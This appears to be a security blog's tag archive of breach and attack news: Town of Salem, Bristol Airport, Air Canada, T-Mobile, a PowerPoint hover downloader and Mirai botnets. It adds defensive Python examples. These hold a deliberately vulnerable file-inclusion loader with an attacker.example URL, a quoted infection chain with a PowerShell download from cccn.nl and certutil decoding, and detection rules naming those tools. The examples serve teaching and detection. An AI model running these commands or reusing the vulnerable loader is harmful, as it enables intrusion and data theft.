Tag Archives: cyber attack

Popular Online Game ‘Town of Salem’ Suffers Data Breach Exposing 7.6 Million Players

A data breach at BlankMediaGames (BMG) has affected more than 7.6 million players of Town of Salem, a browser-based online role-playing game.

The Discovery

The incident was disclosed on December 28 to cybersecurity company DeHashed, which received an anonymous email containing evidence of server and database access.

DeHashed says affected data includes usernames, emails, passwords, IP addresses, game and forum activity, and payment information. Some users who paid for features also had billing data compromised.

The Breach

The attackers exploited a Local/Remote File Inclusion (LFI/RFI) vulnerability in a PHP web application, DeHashed said. In this class of bug a file path or URL taken from the request is handed to an include statement without validation, so an attacker can read files outside the web root (LFI) or, where remote inclusion is enabled, pull in and execute PHP code from a server they control (RFI).

The attackers then gained unauthorized access to the complete gamer database which contained 7,633,234 unique email addresses (most were Gmail, Hotmail, and Yahoo.com email accounts).
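To make the file-inclusion flaw concrete, here is an added example in Python (not BlankMediaGames' or DeHashed's code) that mirrors the PHP pattern include($_GET['page']) beside a hardened loader. The templates directory, the out-of-web-root secret, the attacker inputs and all function names are constructed for the example.

```python
"""Local/Remote File Inclusion: a vulnerable page loader beside a hardened one.

Added example; this is not BlankMediaGames' or DeHashed's code. It mirrors the
PHP pattern  include($_GET['page'])  in Python so the flaw can be run offline.
The template directory, the out-of-web-root secret and the attacker inputs are
all constructed here; function names are the example's own.
"""
import os
import re
import tempfile

SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")  # allowlist for the page parameter


def setup_fixture():
    """Create a constructed templates directory plus a secret file outside it."""
    template_dir = tempfile.mkdtemp(prefix="templates_")
    outside_dir = tempfile.mkdtemp(prefix="outside_")
    with open(os.path.join(template_dir, "home.html"), "w") as f:
        f.write("<h1>Home</h1>")
    secret = os.path.join(outside_dir, "config.php")
    with open(secret, "w") as f:
        f.write("<?php $db_pass = 'hunter2'; ?>")  # constructed secret
    return template_dir, secret


def load_page_vulnerable(template_dir, page):
    """Trusts the request parameter completely, like include($_GET['page']).

    A value such as ../../etc/passwd walks out of template_dir (LFI). In PHP
    with allow_url_include=On the same line would also fetch and *execute*
    http://attacker/c.php (RFI); Python's open() merely fails on a URL.
    """
    with open(os.path.join(template_dir, page)) as f:
        return f.read()


def load_page_hardened(template_dir, page):
    """Allowlist the name, append the extension, then prove the resolved path
    still lives inside template_dir (defence in depth should the allowlist
    ever be loosened)."""
    if not SAFE_NAME.fullmatch(page):
        raise ValueError(f"page name rejected: {page!r}")
    base = os.path.realpath(template_dir)
    target = os.path.realpath(os.path.join(base, page + ".html"))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("resolved path escapes the template directory")
    with open(target) as f:
        return f.read()


def blocked(fn, *args):
    """True when the loader refuses the request."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


def demo():
    template_dir, secret = setup_fixture()
    # Hypothetical attacker inputs: a relative path to the secret, and a remote URL.
    traversal = os.path.relpath(secret, template_dir)  # e.g. ../outside_x/config.php
    remote = "http://attacker.example/c.php"
    return {
        "home": load_page_hardened(template_dir, "home"),
        "leaked": load_page_vulnerable(template_dir, traversal),
        "traversal_blocked": blocked(load_page_hardened, template_dir, traversal),
        "remote_blocked": blocked(load_page_hardened, template_dir, remote),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The hardened loader rejects on two independent grounds: the allowlist refuses anything that is not a bare page name, and the realpath containment check would still catch a traversal if a future change let slashes or dots through.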

BMG’s Response

A BlankMediaGames developer named Achilles responded on the Town of Salem forums that no credit-card numbers were stolen. Further, Achilles wrote, all passwords were hashed and not stored in plain text. "Hashed" says little on its own: how much protection that gives depends on the algorithm and on salting, and fast, unsalted hashes of common passwords are recovered quickly from a leaked dump.

“The only important data compromised would be your Username/hashed password, IP and email,” Achilles wrote. “Everything else is just game related data.”

Moving Forward

Data protection is becoming a much larger issue for game developers; just last month, Bethesda Game Studios came under fire for a bug that leaked player information from support tickets.

If you’ve played Town of Salem, change your password immediately, and change it on any other site where you reused it.

 

Bristol Airport Cyber Attack Leaves Passengers and Airport Staff Scrambling

Airline travelers at Bristol Airport, the UK’s ninth largest airport which handles more than 8 million passengers a year, were forced to read departure times off old-fashioned whiteboards due to technical issues caused by a recent cyber-attack.

Airport officials confirmed the airport was subject to an opportunistic ransomware attack. Ransomware is malicious software that encrypts a victim’s data and demands payment in exchange for the key to restore it.

The Ransomware Attack

Ransomware (also called cyber extortion) is a type of malware (malicious software) designed to deny you access to your own files by encrypting them, then demanding a ransom for the decryption key. Criminals commonly deliver it by tricking you into opening a malicious email attachment that downloads the ransomware, or by luring you to a website that drops it.

Furthermore, a growing number of attacks have come in through exposed Remote Desktop Protocol (RDP) services and other footholds that need no user interaction at all to plant the ransomware.

Air Canada – The Latest Company Compromised by Data Breach

Air Canada, the largest airline in Canada by fleet size and passengers carried, has reported a large data breach of its mobile app, putting thousands of passengers’ passport details and other personal information at risk.

Air Canada’s Response

The airline issued a warning to mobile app users that their personal data may have been compromised in a cyberattack. This may place those who entered their details at risk of identity theft. It is believed approximately 20,000 customers may have had their data stolen. All Air Canada app users have been asked to change their passwords.

Profile data, such as names, email addresses, passport numbers, genders and dates of birth, among others, can all be stored in the airline’s app, making this stored data a potential target in the attack.

Over 2 Million Customers Affected by T-Mobile Data Breach

T-Mobile is warning customers of a data breach that occurred in late August 2018. The company reported to Motherboard that hackers stole the personal data of over 2 million people during the incident.

T-Mobile’s Response

T-Mobile released an official statement saying it quickly shut down a cyberattack on their database, but the incident may have exposed the personal data of 2.3 million of its 77 million customers, or slightly less than 3% of customers.

“We take the security of your information very seriously and have a number of safeguards in place to protect your personal information from unauthorized access,” T-Mobile said. “We truly regret that this incident occurred and are so sorry for any inconvenience this has caused you. None of your financial data – including credit card information – or Social Security numbers were involved, and no passwords were compromised.”

Hovering Over the Link Leads to Malware

Most people are familiar with the commonly held Internet myth: “Don’t click the link. Hover your mouse over it and all will be fine.”

Thanks to the “PowerPoint Mouseover Based Downloader,” simply hovering over a link in a malicious presentation is now all it takes for attackers to compromise your computer. The document carries no macros, JavaScript, or VBA; it abuses a legitimate PowerPoint action.

Attack Details

The attack chains a PowerPoint hover action to Windows PowerShell.

Take your typical social engineering scenario: a user is emailed a PowerPoint attachment. Users who open the document see the text “Loading…Please wait” styled as a familiar blue hyperlink.

Since we are all trained not to click links we don’t recognise, the user hovers over the link to see where the URL leads.

One ‘feature’ of PowerPoint is that it supports a hover (mouse-over) action on links. So in this case, when the user hovers over the text, PowerPoint tries to run the action attached to it and presents a security notice asking whether to allow it.

Enabling the content executes PowerShell, and the attackers win.

Dodge This Security explains how attackers turn that PowerShell launch into remote access to the computer:

“When that PowerShell is executed it reaches out to the domain “cccn.nl” for a c.php file and downloads it to disk as a file named “ii.jse” in the temp folder.

That gets executed by wscript.exe, which then drops a file named “168.gop”; the JavaScript then executes certutil.exe with the -decode parameter. certutil.exe takes 168.gop as the file to decode and saves the output in the temp folder as “484.exe”.

Then “484.exe” is executed and it spawns mstsc.exe to allow RDP access to the system.

After this, 484.exe was observed being renamed and saved to AppData\Roaming\Microsoft\Internet Explorer\sectcms.exe by mstsc.exe, and then it gets re-executed from the new location.

A .bat file was observed being written to disk then executed in cmd.exe. The purpose of this bat file appears to have been to change the attributes of the sectcms.exe program to be hidden, marked as a system file and set as read only.

It also deletes any of the files with the following extensions in the temp folder .txt/.exe/.gop/.log/.jse to get rid of any obvious tracks left behind.”
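The chain quoted above is easier to catch on the endpoint than at the mail gateway, because every stage is a process creation. As an added example (not code from Dodge This Security or from the original post), the following Python runs a handful of detection rules over process-creation events. The log is constructed to mirror that chain; the command lines, paths, timestamps and the pipe-separated format are assumptions standing in for whatever your EDR or Sysmon pipeline emits.

```python
"""Detection rules for the PowerPoint mouse-over chain over process-creation events.

Added example, not code from Dodge This Security or the original post. The log
below is constructed to mirror the chain described above (PowerPoint ->
PowerShell -> wscript.exe -> certutil -decode -> 484.exe -> mstsc.exe); the
command lines, paths and timestamps are assumptions, and the pipe-separated
format stands in for whatever your EDR or Sysmon pipeline emits.
"""
import re
from dataclasses import dataclass

OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
SCRIPT_FILE = re.compile(r"\.(jse|js|vbs|vbe|ps1)\b", re.I)
USER_WRITABLE = re.compile(r"\\(temp|appdata)\\", re.I)  # dirs any user can write to

# Constructed sample: timestamp|parent image|image|command line
SAMPLE_LOG = r"""
2017-06-07T10:00:01|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\Office16\POWERPNT.EXE|POWERPNT.EXE C:\Users\alice\Downloads\order.ppsx
2017-06-07T10:00:09|C:\Program Files\Microsoft Office\Office16\POWERPNT.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -WindowStyle Hidden -NoProfile (New-Object Net.WebClient).DownloadFile('http://cccn.nl/c.php','C:\Users\alice\AppData\Local\Temp\ii.jse')
2017-06-07T10:00:11|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\alice\AppData\Local\Temp\ii.jse
2017-06-07T10:00:12|C:\Windows\System32\wscript.exe|C:\Windows\System32\certutil.exe|certutil.exe -decode C:\Users\alice\AppData\Local\Temp\168.gop C:\Users\alice\AppData\Local\Temp\484.exe
2017-06-07T10:00:13|C:\Windows\System32\wscript.exe|C:\Users\alice\AppData\Local\Temp\484.exe|C:\Users\alice\AppData\Local\Temp\484.exe
2017-06-07T10:00:14|C:\Users\alice\AppData\Local\Temp\484.exe|C:\Windows\System32\mstsc.exe|mstsc.exe
2017-06-07T10:05:00|C:\Windows\explorer.exe|C:\Windows\System32\certutil.exe|certutil.exe -verify C:\Users\alice\Documents\cert.cer
""".strip()


@dataclass
class Event:
    ts: str
    parent: str
    image: str
    cmdline: str


def parse_event(line):
    ts, parent, image, cmdline = (part.strip() for part in line.split("|", 3))
    return Event(ts, parent, image, cmdline)


def exe_name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return the rule names an event trips (empty list for benign events)."""
    parent, image, cmd = exe_name(ev.parent), exe_name(ev.image), ev.cmdline.lower()
    hits = []
    # Stage 1: an Office application launching a script host (the hover action firing).
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Stage 3: certutil abused to decode (or download) a payload; -verify is benign.
    if image == "certutil.exe" and ("-decode" in cmd or "-urlcache" in cmd):
        hits.append("certutil_decode_or_download")
    # Stage 2: wscript/cscript running a script that lives in Temp or AppData.
    if image in {"wscript.exe", "cscript.exe"} and SCRIPT_FILE.search(cmd) and USER_WRITABLE.search(cmd):
        hits.append("script_host_runs_script_from_user_dir")
    # Stage 4: a binary executing from a user-writable directory (484.exe, sectcms.exe).
    if USER_WRITABLE.search(ev.image):
        hits.append("binary_runs_from_user_writable_dir")
    # Stage 5: the RDP client started by such a binary rather than by the user's shell.
    if image == "mstsc.exe" and USER_WRITABLE.search(ev.parent):
        hits.append("mstsc_launched_by_user_dir_binary")
    return hits


def scan(log_text):
    """Run every rule over every event; returns (timestamp, rule) pairs in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        for rule in evaluate(ev):
            findings.append((ev.ts, rule))
    return findings


if __name__ == "__main__":
    for ts, rule in scan(SAMPLE_LOG):
        print(ts, rule)
```

Each rule on its own would be noisy in a large estate (administrators do run certutil and mstsc), but five of them firing from one parent tree within a few seconds is the signature of this chain, and the first rule alone (an Office process spawning PowerShell) deserves an alert regardless.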

What can you do to protect yourself?

The typical “patch” solution is not applicable in this case because the issue is not a bug; it’s a PowerPoint feature.

Instead, IT admins can start by updating Office on all endpoints, since current versions open email attachments and files downloaded from the Internet in Protected View, where the hover action does not run. From there, enforce that behaviour through Group Policy so that Office documents always open in Protected View by default and users cannot quietly weaken it. Then raise awareness by notifying end users of the attack and what to look for.

Users should already be wary of opening Office documents attached to emails. If they do, they should think hard before leaving Protected View, because leaving it is what allows the action to run.

IoT Botnets Pose Big DDoS Threat

 


With the rapid expansion of Internet of Things (IoT) devices and their generally poor security, cyber criminals have a plethora of devices to recruit into their botnets. Botnets are networks of connected devices infected with malware and controlled as a group.

Botnets are often collectively used to launch Distributed Denial of Service (DDoS) attacks. With the mass quantities of IoT devices connected to the Internet, the new trend for cyber criminals is to infect these devices and use them in coordinated attacks.

DDoS Attack

Recently, security journalist Brian Krebs was the target of a massive DDoS attack. A DDoS attack floods a network with requests in order to overload the system so it cannot respond to legitimate ones, effectively taking a website down.

The Krebs attack was one of the largest DDoS attacks on record at over 620 Gbps. It is notable because it was launched by a botnet of IoT devices running the Mirai malware.

Once Mirai infects a device, it first removes any competing malware. It then scans the Internet for other vulnerable devices to add to the botnet: when it finds one, it tries a short dictionary of common default usernames and passwords over Telnet to log in. Reportedly, some 380,000 Mirai-infected IoT devices were used in the Krebs attack.

Mirai’s source code has since been released publicly, so there’s a good chance we’ll see this problem grow as more IoT botnets form. After attacking Krebs’ blog, a Mirai botnet was credited with the massive attack on the DNS provider Dyn, which took several major websites down with it.

Vulnerable IoT Devices

The security industry has identified this as a major problem for quite some time. Most IoT devices have serious security weaknesses and can easily be leveraged in these coordinated attacks. For now, IoT botnets primarily consist of routers, network-enabled cameras, and printers.

The main reason malware like Mirai is so effective is that most IoT devices never have their default credentials changed. Default usernames and passwords for many devices can be found on the Internet, making them trivial to compromise.

Mitigation

To remove Mirai malware from an infected IoT device:

  • Disconnect the device from the network.
  • Perform a reboot. Mirai lives only in dynamic memory, so rebooting clears it. A reboot does not close the door, though: a device put back online with its default credentials is typically reinfected within minutes, so complete the next step before reconnecting.
  • Change the password for the device. Make sure the default password is changed and use a strong password.
  • Reconnect to the network.

Prevention

To prevent Mirai malware from infecting your IoT devices:

  • Ensure all default passwords are changed to strong passwords.
  • Update IoT devices with patches as soon as possible. This isn’t always applicable, as many IoT devices don’t push security patches.
  • Disable Universal Plug and Play on routers unless it’s absolutely necessary.
  • Monitor TCP ports 23 and 2323 for attempts to gain unauthorized control over Telnet; Mirai’s scanner tries both.
  • Look for suspicious traffic on port 48101. Infected devices use port 48101 to send their scan results back to the threat actor, who then loads the malware onto the newly found devices.
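The last two prevention items are easiest to act on if they are written down as rules. The following Python, an added example rather than code from the original post or from US-CERT, runs three such rules over flow records: an internal device sweeping the Internet on Telnet ports (the behaviour of an infected host), many external sources hammering one internal device’s Telnet port (someone else’s bot trying default credentials), and any internal host talking to port 48101. The records are constructed (timestamp src dst dport proto), and the LAN range and thresholds are assumptions to tune for your own network.

```python
"""Spotting Mirai-style activity in flow records: inbound Telnet brute forcing,
an internal device scanning outward on 23/2323, and reports to port 48101.

Added example, not code from the original post or from US-CERT. The flow
records are constructed (timestamp src dst dport proto); the LAN range and the
thresholds are assumptions to tune for your own network.
"""
import ipaddress
from collections import defaultdict

LOCAL_NET = ipaddress.ip_network("192.168.1.0/24")  # assumed LAN
TELNET_PORTS = {23, 2323}
MIRAI_REPORT_PORT = 48101
SCAN_THRESHOLD = 10    # distinct external hosts hit on Telnet ports by one internal device
BRUTE_THRESHOLD = 5    # distinct external sources hitting one internal device's Telnet


def build_sample_flows():
    """Constructed flow records, not capture data. Format: timestamp src dst dport proto."""
    flows = []
    for i in range(12):  # an infected camera sweeping the Internet for Telnet
        port = 23 if i % 2 else 2323
        flows.append(f"2016-10-21T12:00:{i:02d} 192.168.1.20 198.51.100.{i + 1} {port} TCP")
    flows.append("2016-10-21T12:01:00 192.168.1.20 203.0.113.50 48101 TCP")  # scan results upload
    for i in range(6):   # six external hosts probing the router's Telnet port
        flows.append(f"2016-10-21T12:02:{i:02d} 203.0.113.{i + 10} 192.168.1.1 23 TCP")
    flows += [
        "2016-10-21T12:03:00 192.168.1.30 198.51.100.77 443 TCP",  # ordinary HTTPS
        "2016-10-21T12:03:01 192.168.1.30 192.168.1.53 53 UDP",    # local DNS, ignored
        "2016-10-21T12:03:02 192.168.1.50 198.51.100.200 23 TCP",  # one admin Telnet session
    ]
    return flows


def parse_flow(line):
    ts, src, dst, dport, proto = line.split()
    return ts, ipaddress.ip_address(src), ipaddress.ip_address(dst), int(dport), proto


def analyze(flows):
    """Return {internal host: [rule, ...]} for hosts that trip at least one rule."""
    scan_targets = defaultdict(set)   # internal src -> external dsts on Telnet ports
    brute_sources = defaultdict(set)  # internal dst -> external srcs on Telnet ports
    reporters = set()                 # internal hosts talking to 48101
    for line in flows:
        _, src, dst, dport, proto = parse_flow(line)
        if proto != "TCP":
            continue
        if src in LOCAL_NET and dst not in LOCAL_NET:
            if dport in TELNET_PORTS:
                scan_targets[src].add(dst)
            elif dport == MIRAI_REPORT_PORT:
                reporters.add(src)
        elif dst in LOCAL_NET and src not in LOCAL_NET and dport in TELNET_PORTS:
            brute_sources[dst].add(src)

    findings = defaultdict(list)
    # Many distinct Telnet targets from one device is scanning, not administration.
    for host, targets in scan_targets.items():
        if len(targets) >= SCAN_THRESHOLD:
            findings[str(host)].append("telnet_scan_outbound")
    # Port 48101 has no legitimate use on a home or office LAN; one flow is enough.
    for host in reporters:
        findings[str(host)].append("mirai_report_port_48101")
    # Several external sources on one device's Telnet port is a default-credential attack.
    for host, sources in brute_sources.items():
        if len(sources) >= BRUTE_THRESHOLD:
            findings[str(host)].append("inbound_telnet_bruteforce")
    return dict(findings)


if __name__ == "__main__":
    for host, rules in analyze(build_sample_flows()).items():
        print(host, ", ".join(rules))
```

Note the asymmetry the rules encode: a single outbound Telnet session from an administrator’s workstation stays below the scan threshold and is not reported, while a single flow to 48101 is flagged outright because nothing benign on the LAN should use that port.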

[Mitigation and prevention measures referenced from US-CERT Alert TA16-288A, “Heightened DDoS Threat Posed by Mirai and Other Botnets.”]